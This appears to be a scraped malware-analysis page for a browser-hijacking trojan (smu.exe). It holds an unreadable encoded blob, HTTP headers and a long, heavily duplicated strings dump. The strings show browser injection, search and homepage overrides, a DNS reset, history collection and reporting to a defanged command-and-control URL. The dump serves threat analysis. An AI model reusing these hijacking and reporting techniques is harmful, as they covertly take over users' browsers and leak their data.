d=MtqTE47KGyjjA8zS3H7pJFOADWaZCWMCDWjQ0ujplOd9MbV/lVmWaND 60ePIdsrOcMBzS3H5a0be7N36qAF8kdvdSvmslRxPCNs1oS8WZUOzaar9Egy5SzOr9rhzlAQdf09Xr401steNr mQH VoxX6Rze/7NvJYTdPZS04 jvBMWqv6Qvf9DNZawo3yh8aLrtJikea7Vr6RYlRBKnKPhzN0jVqDPxXWcZpZKsofN7lBOl e1/lbjhigtcqjvKJ0HXl60Dt/azGf4WyQ4pBcaujTuYHUvmbfXoBUdDBpfst5Cnu/6UfyPOPBhh4PvLgPcCVrzCocS421e/NCDWm6mw3fw1TVhnvONcolvvTJMhYKAbBQ6MCy/YiDfDObVBWQ6lOY3KgH2A7Ok2sevxNYKZBkH1lwef5iVaJzvCTQFDpqXuumXfvxH80JeF3wmqbFDzGhyy5ZVQY/zgXrmxAdSaCYQnjsEpKqNUiWYmuW54ILS5IZNtenyQHPVyolqBCD/5l0Jp/pGw/wdklma XkH/sMYQW/q6APL9AZS6vInj5q402KYmuO7uUVWQkNDrUzVQogiSiHUUbkt9xGmkZ3KbvoMG8r9VxUGu2nQcHLKpLbWdCZoCU6lTrA4SDxYt3XQUh14jtaQ6zaqej14QNUX9tuDXbGFU/4ilR5GOuvw37L WtwDUNySQevrJPNOODaBdBZnaFneyb3tAKPGOiQlcUlcnVIrWNWsGrgZefH875FB4dAsQ5PNnszPtZSAO/AudQs9axn3MjcyAgLnSpYGBy1utPgkEJWFebggy2cY1Sa9k zM04yMJWSpAMTxjmcpfDFzOuHVu dUt73kOcovtbTwO1fRDkEvb7nxvf6F9X4XhtGfA6F9un4Sj tycBIXzlj5AJYVGg9CeDOJiHVYEMD6f0Yxw9PvVvnPv67ClaftH4KT2nccqYvSDAOzz7tO5R OJbSC7H67zZblJzmrY3OfIBxIaolmlJImDSsXKAcuKKCKL0Y0Gf/sSMU6n3cHi5Y9Aw06mw26Anf1ZHGdeySNMAGf2g58F8QzEcR48L

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private,no-cache, no-store

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:18 GMT

X-Cache: Miss from cloudfront

Via: 1.1 69ae15d1338b64299d3942a44fc1fb96.cloudfront.net (CloudFront)

X-Amz-Cf-Id: y-P4GnL3XgWw958bmBsKHnH4bmjE4R0VQRvOHKvG4EUsEqr--HSwQg==

Map

The Trojan connects to the servers at the following location(s):

Strings from Dumps

smu.exe_3356:

.text

`.rdata

@.data

.rsrc

@.reloc

[email protected]

<:>

t8Ht.HHt#

F2t%f

#t.Ht

2 34 567

j.Yf;

[email protected]

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

0123456789-

%b %d %H : %M : %S %Y

%m / %d / %y

%I : %M : %S %p

%d / %m / %y

operator

GetProcessWindowStation

?456789:;

!"#$%&'()* ,-./0123

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

1.2.3

SQLite format 3

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY

CREATE TABLE sqlite_master(

sql text

3.7.2

CREATE TEMP TABLE sqlite_temp_master(

208.69.150.250

208.69.150.252

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.Path:

Watcher.Filter:

2.3.12.1634

smu.exe

Chrome

Report.xml

/Url:

Report factory:

Update.xml

URLSet

Report

homeURL

suggestURL

newTabURL

ieSearchURL

chSearchURL

ffSearchURL

opSearchURL

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

Argument.CheckResult:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report failed.

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExW

CCCzdef1,11111111-1111-1111-1111-111111111111

NtQueryKey

1.3.6.1.4.1.311.2.1.12

urls

ERROR: %s

SELECT * FROM urls

WebData path:

favicon_url

keyword

originating_url

suggest_url

keywords

keyword LIKE '

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

search_url

icon_url

startup_urls

chrome_url_overrides

urls_to_restore_on_startup

www-searching.com

template_url_data

image_url_post_params

instant_url

instant_url_post_params

search_terms_replacement_key

new_tab_url

search_url_post_params

suggestions_url

suggestions_url_post_params

chrome_settings_overrides

session.startup_urls

web_url

search_icon.png

X;

%s>

%s="%s"

%s='%s'

version="%s"

encoding="%s"

standalone="%s"

Snapshot.xml

MozillaFirefox

GoogleChrome

AboutTabsUrl

HomePageUrl

DefaultProviderKeyword

UrlsToRestoreOnStartup

StartupHomepageUrl

Chrome propagate flags:

Firefox propagate flags:

ParentKey:


2, 3, 12, 1634

Envelop.xml

UrlSet

Configuration.xml

Opera

StartPageUrl

AboutTabUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginSuggestionUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineKeyword

System.xml

Reset-2.1.0.7

ReportUrl

UpdateUrl

ReportDlls

User.xml

Argument.Snapshot:

Argument.GeneralConfig:

Argument.Flags:

Argument.StartPage:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.Tabs:

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

unable to close due to unfinished backup operation

SQL logic error or missing database

large file support is disabled

unknown database: %s

no such vfs: %s

misuse at line %d of [%.10s]

database corruption at line %d of [%.10s]

cannot open file at line %d of [%.10s]

SQLITE_

d-d-d d:d:d

d-d-d

d:d:d

failed memory resize %u to %u bytes

failed to allocate %u bytes of memory

API call with %s database connection pointer

922337203685477580

RowKey

%s-shm

OsError 0x%x (%u)

%s\etilqs_

Recovered %d frames from WAL file %s

2nd reference to page %d

invalid page number %d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

Failed to read ptrmap key=%d

failed to get page %d

%d of %d pages missing from overflow list starting at %d

Page %d:

freelist leaf count too big on page %d

btreeInitPage() returns error code %d

unable to get the page. error code=%d

On tree page %d cell %d:

On page %d at right child:

Multiple uses for byte %d of page %d

Corruption detected in cell %d on page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Outstanding page count goes from %d to %d during this analysis

Pointer map page %d is referenced

keyinfo(%d

%s(%d)

foreign key constraint failed

%s-mjX

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

constraint failed at %d in [%s]

abort at %d in [%s]: %s

no such savepoint: %s

cannot open savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot %s savepoint - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

sqlite_master

cannot change %s wal mode from within a transaction

statement aborts at %d: [%s] %s

database table is locked: %s

cannot open view: %s

cannot open virtual table: %s

foreign key

no such column: "%s"

cannot open %s column for writing

indexed

cannot open value of type %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s

%s: %s.%s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

variable number must be between ?1 and ?%d

Expression tree is too large (maximum depth %d)

too many columns in %s

too many SQL variables

misuse of aggregate: %s()

%s%.*s"%w"

%.*s"%w"%s

sqlite_rename_table

sqlite_rename_parent

sqlite_rename_trigger

%s OR name=%Q

there is already another table or index with this name: %s

table %s may not be altered

sqlite_

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

view %s may not be altered

sqlite_sequence

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_stat1

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

invalid name: "%s"

SELECT idx, stat FROM %Q.sqlite_stat1

too many attached databases - max %d

database %s is already in use

unable to open database: %s

cannot detach database %s

no such database: %s

database %s is locked

sqlite_attach

sqlite_detach

%s %T cannot reference objects in database %s

access to %s.%s is prohibited

access to %s.%s.%s is prohibited

object name reserved for internal use: %s

too many columns on %s

there is already an index named %s

default value of column [%s] is not constant

duplicate column name: %s

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

table "%s" has more than one primary key

no such collation sequence: %s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE %s %.*s

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

table %s may not be dropped

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

use DROP VIEW to delete view %s

use DROP TABLE to delete table %s

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %s.sqlite_sequence WHERE name=%Q

foreign key on %s should reference only one column of table %T

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

unknown column "%s" in foreign key definition

number of columns in foreign key does not match the number of columns in the referenced table

indexed columns are not unique

table %s may not be indexed

virtual tables may not be indexed

views may not be indexed

index %s already exists

there is already a table named %s

table %s has no column named %s

sqlite_autoindex_%s_%d

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

CREATE%s INDEX %.*s

no such index: %S

DELETE FROM %Q.%s WHERE name=%Q

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

unable to identify the object to be reindexed

cannot modify %s because it is a view

table %s may not be modified

sqlite_source_id

sqlite_version

sqlite_compileoption_get

sqlite_compileoption_used

foreign key mismatch

table %S has %d columns but %d values were supplied

table %S has no column named %s

%d values for %d columns

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

no entry point [%s] in shared library [%s]

unable to open shared library [%s]

automatic extension loading failed: %s

error during initialization: %s

foreign_keys

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

unsupported file format

database schema is locked: %s

RIGHT and FULL OUTER JOINs are not currently supported

unknown or unsupported join type: %T %T%s%T

cannot have both ON and USING clauses in the same join

a NATURAL join may not have an ON or USING clause

cannot join using column %s - column not present in both tables

%s.%s

ORDER BY clause should come after %s not before

%s:%d

SELECTs to the left and right of %s do not have the same number of result columns

LIMIT clause should come after %s not before

sqlite_subquery_%p_

no such index: %s

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

cannot create INSTEAD OF trigger on table: %S

no such trigger: %S

no such column: %s

-- TRIGGER %s

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor did not declare schema: %s

vtable constructor failed: %s

no such module: %s

at most %d tables in a join

table %s: xBestIndex returned an invalid plan

TABLE %s

cannot use index: %s

%s WITH AUTOMATIC INDEX

%s AS %s

%s VIA MULTI-INDEX UNION

%s WITH INDEX %s

%s VIRTUAL TABLE INDEX %d:%s

%s USING PRIMARY KEY

%s ORDER BY

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

SHELL32.dll

SHLWAPI.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WS2_32.dll

PSAPI.DLL

WTSAPI32.dll

Secur32.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

USERENV.dll

HttpSendRequestExW

HttpSendRequestW

HttpAddRequestHeadersW

HttpQueryInfoW

HttpOpenRequestW

HttpEndRequestW

WININET.dll

CreatePipe

ConnectNamedPipe

CreateNamedPipeW

DisconnectNamedPipe

GetNamedPipeInfo

GetCPInfo

RegCreateKeyW

RegCreateKeyExW

RegOpenKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyW

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyExA

RegQueryInfoKeyA

RegOpenKeyA

RegEnumKeyExW

RegEnumKeyW

if (WScript.Arguments.length > 0)

var root = WScript.Arguments(0);

for (var i = 1, n = WScript.Arguments.length; i

args.push(WScript.Arguments(i));

var path = "\"" root.replace(/\\*$/, "").replace(/\//g, "\\") "\"";

path = " \"" args.join("\" \"") "\"";

var shell = WScript.CreateObject("WScript.Shell");

shell.Run(path, 0, false);

combase.dll

kernel32.dll

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

Injection::Snapshot::Controller::IsChromeInstalled

Chrome installed:

Injection::Snapshot::Controller::IsFirefoxInstalled

Firefox installed:

Chrome unchanged:

Firefox unchanged:

Checking

Checking

logs\${ModuleName}.${Pid}.log

WatchmanKey::TimeBomb::UninstallTimeBomb

Reporting

ChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CheckExtension

8Reset DNS to 8.8.8.8 for adapter

WinHTTP Example/1.0

VVV.google.com

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Registry::Helper::RegOpenKeyExA

Chrome::StartPageProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::StartPageProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Firefox::StartPageChangedByUser

Firefox::SearchEngineChangedByUser

Explorer.HomePageEvent:

Explorer.SearchEngineEvent:

Firefox.HomePageEvent:

Firefox.SearchEngineEvent:

ProcessCatcher::ExecutionContext::Resume

Allocation

iexplore.exe

rundll32.exe

chrome.exe

firefox.exe

opera.exe

safari.exe

navigator.exe

torch.exe

U.exe

epic.exe

browser.exe

Maxthon.exe

sbframe.exe

avant.exe

dragon.exe

bobrowser.exe

crossbrowse.exe

vosteran.exe

ProcessMonitor::ExecutionContext::Resume

E:\iexplore.exe|E:\rundll32.exe

E:\chrome.exe

E:\chrome.exe

E:\firefox.exe

E:\firefox.exe

E:\opera.exe

E:\opera.exe

E:\Safari.exe|E:\crossbrowse.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\vosteran.exe|E:\browser.exe|E:\avant.exe|E:\bobrowser.exe

E:\Safari.exe|E:\crossbrowse.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\vosteran.exe|E:\browser.exe|E:\avant.exe|E:\bobrowser.exe

smci32.dll

smci32.dll

smi32.exe

smi32.exe

Utils::PipedProcess::Create

Utils::PipedProcess::Create

Utils::PipedProcess::Start

Utils::PipedProcess::Start

Utils::PipedProcess::WriteData

Utils::PipedProcess::WriteData

[ReportDllsThread]

[ReportDllsThread]

ProcessWatcher::ExecutionContext::Resume

ProcessWatcher::ExecutionContext::Resume

Local proxy port:

Local proxy port:

127.0.0.1

127.0.0.1

[ProxyMonitor::getProcessByPort]

[ProxyMonitor::getProcessByPort]

Failed to get GetExtendedTcpTable

Failed to get GetExtendedTcpTable

smei32.dll

smei32.dll

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::CalculateHash]

[ReportBuilder::CalculateHash]

Result.Hash:

Result.Hash:

[ReportBuilder::MakeHistoryReport]

[ReportBuilder::MakeHistoryReport]

Building history report...

Building history report...

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetChromeBrowserInfo

ReportBuilder::GetChromeBrowserInfo

. Chrome Search:

. Chrome Search:

History Report:

History Report:

[ReportBuilder::MakeReport]

[ReportBuilder::MakeReport]

Report:

Report:

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::GetInfo

Chrome::BrowserInfo::Factory::GetInfo

sma.exe

sma.exe

Utils::PipedProcess::ReadData

Utils::PipedProcess::ReadData

Utils::PipedProcess::Wait

Utils::PipedProcess::Wait

Utils::PipedProcess::WriteEof

Utils::PipedProcess::WriteEof

Utils::MachineKey::Create

Utils::MachineKey::Create

Utils::MachineKey::Generate

Utils::MachineKey::Generate

Encrypt data. Key:

Encrypt data. Key:

Decrypt data. Key:

Decrypt data. Key:

ReportBuilder::MakeInstallReport

ReportBuilder::MakeInstallReport

[ServerReporter::SendInstallReport]

[ServerReporter::SendInstallReport]

ReportBuilder::MakeUninstallReport

ReportBuilder::MakeUninstallReport

[ServerReporter::SendUninstallReport]

[ServerReporter::SendUninstallReport]

ReportBuilder::MakeRegulatReport

ReportBuilder::MakeRegulatReport

[ServerReporter::SendRegularReport]

[ServerReporter::SendRegularReport]

ReportBuilder::MakeUserActionReport

ReportBuilder::MakeUserActionReport

[ServerReporter::SendUserActionReport]

[ServerReporter::SendUserActionReport]

ReportBuilder::MakeHistoryReport

ReportBuilder::MakeHistoryReport

[ServerReporter::SendHistoryReport]

[ServerReporter::SendHistoryReport]

ServerReporter::MakeReport

ServerReporter::MakeReport

ServerReporter::SendReport

ServerReporter::SendReport

[ServerReporter::SendReport]

[ServerReporter::SendReport]

ServerEncryption::CreateSessionKey

ServerEncryption::CreateSessionKey

Report in Base 64:

Report in Base 64:

10D2FBE6-2346-4627-A9F5-FB48313C5001

10D2FBE6-2346-4627-A9F5-FB48313C5001

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

[ServerReporter::GetUserProfile]

[ServerReporter::GetUserProfile]

[ServerReporter::MakeReport]

[ServerReporter::MakeReport]

ServerReporter::GetUserProfile

ServerReporter::GetUserProfile

ReportBuilder::Create

ReportBuilder::Create

Result.Report:

Result.Report:

[ServerReporter::SetLastReportTime]

[ServerReporter::SetLastReportTime]

WatchmanKey::Reporter::SetLastTime

WatchmanKey::Reporter::SetLastTime

Package url:

Package url:

WatchmanKey::Updater::SetLastTime

WatchmanKey::Updater::SetLastTime

.Service

.Service

\Microsoft\Windows\Start Menu

\Microsoft\Windows\Start Menu

*.lnk

*.lnk

\Internet Explorer\iexplore.exe

\Internet Explorer\iexplore.exe

\Safari\Safari.exe

\Safari\Safari.exe

/report

/report

/report1

/report1

%d.%d.%d.%d%n

%d.%d.%d.%d%n

Created URL Set object from configuration. Name:

Created URL Set object from configuration. Name:

UrlSetID:

UrlSetID:

Could not find matching URL set... Using old configuration

Could not find matching URL set... Using old configuration

[LocalScope::UpdateParser::ParseReportSection]

[LocalScope::UpdateParser::ParseReportSection]

Monitor::ServerEncryption::CreateSessionKey

Monitor::ServerEncryption::CreateSessionKey

Full url:

Full url:

Data url:

Data url:

sbu.exe

sbu.exe

smw.sys

smw.sys

wscript.exe

wscript.exe

smhe.js

smhe.js

[Monitor::WatchmanGuard::SendReport]

[Monitor::WatchmanGuard::SendReport]

InstallReporter

InstallReporter

Monitor::ServerReporter::Create

Monitor::ServerReporter::Create

Monitor::ServerReporter::SendInitialReport

Monitor::ServerReporter::SendInitialReport

/urlset:

/urlset:

Options.InjectAllBrowsers:

Options.InjectAllBrowsers:

Options.InjectDefaultOnly:

Options.InjectDefaultOnly:

Options.ServiceName:

Options.ServiceName:

Options.ProductCode:

Options.ProductCode:

Options.ProductPriority:

Options.ProductPriority:

Options.EnablePinner:

Options.EnablePinner:

Options.EnableRedirect:

Options.EnableRedirect:

Options.EnableYellowBandSuppression:

Options.EnableYellowBandSuppression:

Options.UpdateUrl:

Options.UpdateUrl:

Options.ReportUrl:

Options.ReportUrl:

Options.AutoStart:

Options.AutoStart:

Options.ProtectSearch:

Options.ProtectSearch:

Options.ProtectHome:

Options.ProtectHome:

Options.ProtectTab:

Options.ProtectTab:

Options.ExplorerInjection:

Options.ExplorerInjection:

Options.ChromeInjection:

Options.ChromeInjection:

Options.FirefoxInjection:

Options.FirefoxInjection:

Options.OperaInjection:

Options.OperaInjection:

Options.ConfigPath:

Options.ConfigPath:

Options.ConfigKey:

Options.ConfigKey:

Getting current URL Set

Getting current URL Set

Getting URL Set from options

Getting URL Set from options

] Provided. And is different from current URL set [

] Provided. And is different from current URL set [

URL Set [

URL Set [

general_config.xml

general_config.xml

system_config.xml

system_config.xml

[WatchmanInstaller::SendReport1]

[WatchmanInstaller::SendReport1]

iexplore.exe is running, result for getting DLL's:

iexplore.exe is running, result for getting DLL's:

firefox.exe is running, result for getting DLL's:

firefox.exe is running, result for getting DLL's:

chrome.exe is running, result for getting DLL's:

chrome.exe is running, result for getting DLL's:

ServerReporter::Create

ServerReporter::Create

URL to use:

URL to use:

ServerReporter::SendRegularReport

ServerReporter::SendRegularReport

[WatchmanInstaller::SendReport]

[WatchmanInstaller::SendReport]

Currently set URLSet:

Currently set URLSet:

Updating system config with new URL set...

Updating system config with new URL set...

Already reported duiring first install

Already reported duiring first install

Report' been sent:

Report' been sent:

WatchmanInstaller::SendReport1

WatchmanInstaller::SendReport1

calling SendReport1...

calling SendReport1...

WatchmanInstaller::SendReport

WatchmanInstaller::SendReport

[Monitor::WatchmanMonitor::CreateSendReportTask]

[Monitor::WatchmanMonitor::CreateSendReportTask]

SendReportTask

SendReportTask

new

new

[Monitor::WatchmanMonitor::OnSendReportSucceeded]

[Monitor::WatchmanMonitor::OnSendReportSucceeded]

[Monitor::WatchmanMonitor::OnSendReportFailed]

[Monitor::WatchmanMonitor::OnSendReportFailed]

Need to send report!!!

Need to send report!!!

Original report URL:

Original report URL:

ServerReporter::SendInitialReport

ServerReporter::SendInitialReport

[Monitor::WatchmanMonitor::OnChromeProtectionChanged]

[Monitor::WatchmanMonitor::OnChromeProtectionChanged]

User has changed the chrome protection for:

User has changed the chrome protection for:

[Monitor::WatchmanMonitor::OnResetFirefoxProtection]

[Monitor::WatchmanMonitor::OnResetFirefoxProtection]

User has reset the firefox protection:

User has reset the firefox protection:

Next report task:

Next report task:

Scheduller::RegisterTask

Scheduller::RegisterTask

Monitor::Application::EnsureSystemKey

Monitor::Application::EnsureSystemKey

Options.Revert:

Options.Revert:

Settings.Final:

Settings.Final:

ADVAPI32.DLL

ADVAPI32.DLL

shlwapi.dll

shlwapi.dll

Utils::Registry::OpenKeyExW

Utils::Registry::OpenKeyExW

Subkey:

Subkey:

[Utils::Registry::RecursiveDeleteKeyW]

[Utils::Registry::RecursiveDeleteKeyW]

SHLWAPI.GetAddressOf

SHLWAPI.GetAddressOf

WKERNEL32.DLL

WKERNEL32.DLL

VERSION.DLL

VERSION.DLL

hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx

hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx

\\.\pipe\

\\.\pipe\

Could not create thread event. %%s

Could not create thread event. %%s

Could not create new client event. %%s

Could not create new client event. %%s

Could not create accept thread. %%s

Could not create accept thread. %%s

Could not create work thread. %%s

Could not create work thread. %%s

Could not start thread. %%s

Could not start thread. %%s

Stop IPC error. %%s

Stop IPC error. %%s

Pipe (0x%X) read problems. %%s

Pipe (0x%X) read problems. %%s

NTDLL.DLL

NTDLL.DLL

Windows NT 6.1

Windows NT 6.1

%s?e=%s

%s?e=%s

zvl=%s&

zvl=%s&

%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s

%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s

&tss=%d&action=%s&actionparam=%s

&tss=%d&action=%s&actionparam=%s

[Utils::PipedProcess::CreateOutputHandles]

[Utils::PipedProcess::CreateOutputHandles]

[Utils::PipedProcess::CreateInputHandles]

[Utils::PipedProcess::CreateInputHandles]

[Utils::PipedProcess::SpawnProcess]

[Utils::PipedProcess::SpawnProcess]

Utils::PipedProcess::CreateOutputHandles

Utils::PipedProcess::CreateOutputHandles

Utils::PipedProcess::CreateInputHandles

Utils::PipedProcess::CreateInputHandles

Utils::PipedProcess::SpawnProcess

Utils::PipedProcess::SpawnProcess

[Utils::PipedProcess::Start]

[Utils::PipedProcess::Start]

[Utils::PipedProcess::Wait]

[Utils::PipedProcess::Wait]

Utils::PipedProcess::WriteProc

Utils::PipedProcess::WriteProc

[Utils::PipedProcess::WriteData]

[Utils::PipedProcess::WriteData]

Utils::PipedProcess::ReadProc

Utils::PipedProcess::ReadProc

[Utils::PipedProcess::ReadData]

[Utils::PipedProcess::ReadData]

.cache

.cache

ntdll.dll

ntdll.dll

Could not open memory object. Object name: %s. %%s

Could not open memory object. Object name: %s. %%s

Could not create memory object. Object name: %s. %%s

Could not create memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. Size: %u. %%s

Could not map memory object. Object name: %s. Size: %u. %%s

Could not map memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. %%s

Could not create sync object for memory. Object name: %s. %%s

Could not create sync object for memory. Object name: %s. %%s

pathToSignedProductExe

pathToSignedProductExe

SELECT * FROM Win32_OperatingSystem

SELECT * FROM Win32_OperatingSystem

[BrowserHistory::GetPropertyReport]

[BrowserHistory::GetPropertyReport]

Found URL:

Found URL:

X-hX-hX-XX-XXXXXX

X-hX-hX-XX-XXXXXX

IExecAction::put_Path

IExecAction::put_Path

IAction::QueryInterface

IAction::QueryInterface

IExecAction::put_Arguments

IExecAction::put_Arguments

IExecAction::put_WorkingDirectory

IExecAction::put_WorkingDirectory

http\shell\open\command

http\shell\open\command

Software\Microsoft\Windows\CurrentVersion\App Paths

Software\Microsoft\Windows\CurrentVersion\App Paths

[Utils::SoftwareInfo::GetHttpOpenHandler]

[Utils::SoftwareInfo::GetHttpOpenHandler]

Utils::Registry::OpenKeyW

Utils::Registry::OpenKeyW

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Could not create pipe. %%s

Could not create pipe. %%s

Could not allocate IPC memory. Requires size: %u

Could not allocate IPC memory. Requires size: %u

Event error. %%s

Event error. %%s
